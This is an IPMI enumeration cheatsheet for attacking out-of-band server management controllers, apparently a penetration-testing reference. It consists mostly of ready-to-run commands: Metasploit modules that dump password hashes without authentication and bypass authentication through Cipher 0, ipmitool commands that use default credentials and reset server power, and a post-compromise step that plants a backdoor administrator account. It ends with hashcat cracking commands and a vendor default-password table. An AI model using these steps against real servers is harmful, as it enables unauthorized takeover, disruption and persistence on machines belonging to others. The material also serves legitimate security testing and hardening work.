IPMI Enumeration Cheatsheet
Default Port: 623 (UDP)
What is IPMI? Intelligent Platform Management Interface — out-of-band management for servers (iDRAC, iLO, BMC). Can give full remote control even if OS is down.
Detection & Version
nmap -sU -p 623 <ip>
nmap -sU -p 623 --script ipmi-version <ip>
Nmap Scripts
nmap -sU -p 623 --script ipmi-version <ip>
nmap -sU -p 623 --script ipmi-cipher-zero <ip> # Check for Cipher 0 auth bypass
Metasploit Modules
# Version detection
use auxiliary/scanner/ipmi/ipmi_version
set RHOSTS <ip>
run
# Dump RAKP hashes (no auth needed)
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <ip>
run
# Cipher 0 auth bypass (unauthenticated admin access)
use auxiliary/scanner/ipmi/ipmi_cipher_zero
set RHOSTS <ip>
run
ipmitool (Direct Interaction)
# Version/status
ipmitool -I lanplus -H <ip> -U admin -P admin chassis status
# List users
ipmitool -I lanplus -H <ip> -U admin -P admin user list
# LAN config
ipmitool -I lanplus -H <ip> -U admin -P admin lan print
# Power control
ipmitool -I lanplus -H <ip> -U admin -P admin power status
ipmitool -I lanplus -H <ip> -U admin -P admin power reset
# Add user (post-compromise)
ipmitool -I lanplus -H <ip> -U admin -P admin user set name 4 hacker
ipmitool -I lanplus -H <ip> -U admin -P admin user set password 4 Password1
ipmitool -I lanplus -H <ip> -U admin -P admin user priv 4 4 # Admin priv
ipmitool -I lanplus -H <ip> -U admin -P admin user enable 4
Hash Cracking (After RAKP Dump)
# Hashcat mode 7300 = IPMI2 RAKP HMAC-SHA1
hashcat -m 7300 hashes.txt wordlist.txt
hashcat -m 7300 hashes.txt wordlist.txt -r rules/best64.rule
Default Credentials
| Vendor / Interface | Username | Default Password |
|---|---|---|
| Dell iDRAC | root | calvin |
| HP iLO | Administrator | (printed on pull tab) |
| Supermicro IPMI | ADMIN | ADMIN |
| IBM IMM | USERID | PASSW0RD |
| Cisco CIMC | admin | password |
| Intel RMM | admin | (blank) |
Key Vulnerabilities
| Issue | Description |
|---|---|
| Cipher 0 | Allows unauthenticated auth bypass — attacker can set any password |
| RAKP hash dump | IPMI spec allows anyone to request auth hash → offline crack |
| Default creds | Most systems ship with known default credentials |
| Anonymous auth | Some BMCs allow completely anonymous access |